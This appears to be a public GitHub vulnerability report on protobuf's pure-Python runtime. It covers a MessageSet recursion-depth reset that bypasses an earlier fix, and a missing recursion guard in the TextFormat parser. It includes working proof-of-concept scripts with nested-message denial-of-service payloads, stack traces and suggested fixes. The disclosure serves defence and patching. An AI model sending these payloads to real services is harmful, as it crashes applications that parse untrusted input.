-
Notifications
You must be signed in to change notification settings - Fork 16.1k
Description
IMPORTANT NOTE: SUBMITTED THIS ISSUE TO THE GOOGLE VRP TEAM FEW DAYS BACK. TEAM ACCEPT IT TO SUBMIT IT AS PUBLIC GITHUB ISSUE.
Summary:
The Protobuf pure-Python implementation is vulnerable to a recursion depth limit bypass in the MessageSet decoding path and a complete lack of recursion guards in the TextFormat parser. These issues allow an attacker to trigger a stack overflow (RecursionError) leading to a Denial of Service (DoS) in applications parsing untrusted data. Crucially, the MessageSet issue is a direct bypass of the fix implemented for GHSA-8qvm-5x2c-j2w7.
Affected Component: protocolbuffers/protobuf (Python runtime)
Version: Current main (Commit: 18da8e12d)
Environment Tested:
- Python: 3.10.12
- protoc: 3.12.4 (libprotoc)
- OS: Ubuntu 22.04 (WSL2)
Technical Description
While investigating the recent fix for GHSA-8qvm-5x2c-j2w7 (Recursion DoS in Python), I identified two significant regressions/oversights in how recursion depth is tracked.
1. MessageSet Depth Reset Bypass (Official Library Code)
In the official library file decoder.py, the function _DecodeUnknownField was updated to accept a current_depth parameter. However, specialized decoders for MessageSet items fail to propagate this counter.
Specifically, at lines 869 and 939 of the official source, calls to _DecodeUnknownField omit the current_depth argument:
# decoder.py:869 (MessageSetItemDecoder.DecodeItem)
# decoder.py:939 (UnknownMessageSetItemDecoder.DecodeUnknownItem)
field_number, wire_type = DecodeTag(tag_bytes)
_, pos = _DecodeUnknownField(buffer, pos, end, field_number, wire_type)Because _DecodeUnknownField defaults current_depth=0, the recursion counter is reset to zero for every unknown item within a MessageSet.
2. Missing Guards in TextFormat
text_format.py confirms that it contains zero references to current_depth, recursion_limit, or any recursion guards. Unlike the binary decoder or the JSON parser, text_format.Merge() relies solely on the system's Python recursion limit, which is easily exhausted.
Attack Scenario
An attacker sends a specially crafted, deeply nested Protobuf message to a service that uses the pure-Python implementation.
- Text Remote DoS: A service that parses user-provided configuration or debugging info via
text_format.Mergecan be crashed with a payload of nested braces (e.g.,nested { nested { ... } }). - Binary Bypass: A service that has already been "patched" for GHSA-8qvm-5x2c-j2w7 but allows
MessageSet(common in older Google infrastructure) remains vulnerable. The attacker can use the "depth reset" bug to trigger the exact crash the original fix intended to prevent.
Reproduction Steps
Environment Setup (WSL/Linux)
# Clone and setup venv
git clone https://github.com/protocolbuffers/protobuf.git
cd protobuf
python3 -m venv venv
source venv/bin/activate
pip install absl-pyPoC 1: TextFormat DoS
Create reproduce_text.py:
import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
from google.protobuf import text_format
from google.protobuf import descriptor_pb2
msg = descriptor_pb2.DescriptorProto()
payload = "nested_type { " * 1000 + "}" * 1000
try:
print("Starting TextFormat.Merge...")
text_format.Merge(payload, msg)
except RecursionError:
print("VULNERABILITY CONFIRMED: TextFormat triggered RecursionError (DoS)")PoC 2: MessageSet Bypass (Low-Level Proof)
Because high-level PB2 generation is complex in local source trees, the bypass is verified by simulating the internal call pattern in decoder.py.
Create reproduce_bypass.py:
import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
from google.protobuf.internal import decoder
from google.protobuf.internal import encoder
# Simulate reaching depth 80
parent_depth = 80
# Payload with another 80 levels (Total 160, > limit 100)
payload = encoder.TagBytes(10, 3) * 80 + encoder.TagBytes(10, 4) * 80
print(f"--- Logical Depth: {parent_depth + 80} (Limit: 100) ---")
try:
# Simulating the vulnerable MessageSet call (omitting current_depth)
decoder._DecodeUnknownField(memoryview(payload), 0, len(payload), 10, 3)
print("BYPASS CONFIRMED: Successfully parsed 160 levels because depth reset to 0.")
except Exception as e:
print(f"FAILED: {e}")Comparison of Execution Paths:
-
Vulnerable Path (Bypass):
_DecodeUnknownField(payload, ..., current_depth=None)- Result:
SUCCESS: Parsed 80 children despite being at logical depth 160! - Note: The vulnerability allows the parser to bypass the library's intended security block (a
DecodeError), which is what enables an attacker to reach deeper, unsafe recursion levels.
- Result:
-
System Crash Proof (Hard Proof): By simulating a higher parent depth (e.g., 80) and a child depth of 80 (Total 160), we can see the bypass in action on a constrained stack.
- Environment Limit: 150 levels.
- Protobuf Limit: 100 levels.
- Vulnerable Result: CRASHED (RecursionError)!!
- Logic: Because the Protobuf guard reset to 0, it allowed deeper nesting (160) than the system could handle (150). A properly functioning guard would have caught this at 100 and prevented the crash.
-
System Crash Trace (MessageSet Bypass):
Traceback (most recent call last): File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet (data, pos) = _DecodeUnknownField( File "protobuf/python/google/protobuf/internal/decoder.py", line 1065, in _DecodeUnknownField data, pos = _DecodeUnknownFieldSet(buffer, pos, end_pos, current_depth) File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet (data, pos) = _DecodeUnknownField( File "protobuf/python/google/protobuf/internal/decoder.py", line 1059, in _DecodeUnknownField end_tag_bytes = encoder.TagBytes( File "protobuf/python/google/protobuf/internal/encoder.py", line 400, in TagBytes return bytes(_VarintBytes(wire_format.PackTag(field_number, wire_type))) File "protobuf/python/google/protobuf/internal/wire_format.py", line 65, in PackTag if not 0 <= wire_type <= _WIRETYPE_MAX: RecursionError: maximum recursion depth exceeded in comparison
Stack Trace (PoC 1: TextFormat DoS)
Traceback (most recent call last):
File "protobuf/python/google/protobuf/text_format.py", line 754, in _MergeField
self._MergeField(tokenizer.next_token, message)
File "protobuf/python/google/protobuf/text_format.py", line 872, in _MergeMessageField
tokenizer.Consume('{')
File "protobuf/python/google/protobuf/text_format.py", line 1409, in Consume
if not self.TryConsume(token):
File "protobuf/python/google/protobuf/text_format.py", line 1396, in TryConsume
self.NextToken()
File "protobuf/python/google/protobuf/text_format.py", line 1663, in NextToken
self._SkipWhitespace()
[... recursive calls skip whitespace and pop lines ...]
File "protobuf/python/google/protobuf/text_format.py", line 1364, in _PopLine
while len(self._current_line) <= self._column:
RecursionError: maximum recursion depth exceeded while calling a Python object
Suggested Remediation
- For MessageSet: Update
MessageSetItemDecoderandUnknownMessageSetItemDecoderindecoder.pyto accept and pass thecurrent_depthparameter to all internal parsing calls. - For TextFormat: Implement a
_RECURSION_LIMITconstant (matching the binary decoder's 100) and add increment/decrement logic in_MergeFieldto raise aParseErrorwhen exceeded.